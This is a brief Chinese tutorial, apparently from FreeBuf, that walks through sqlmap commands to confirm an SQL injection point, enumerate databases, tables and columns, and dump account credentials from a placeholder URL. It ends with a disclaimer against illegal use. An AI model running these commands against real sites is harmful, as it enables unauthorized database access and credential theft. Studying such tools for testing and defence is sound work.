SQLmap注入教程
一次sqlmap注入点并且dump出账号密码全程
判断注入点:sqlmap.py -u “存在注入url”
爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs
查看当前使用账号:sqlmap.py -u “存在注入url” --current-user
1、查看当前数据库:sqlmap.py -u “存在注入url” --current-db
2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” --tables。解释说明:-D是指定数据库名称。3、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” --columns。4、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “当前表的字段” --dump。
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐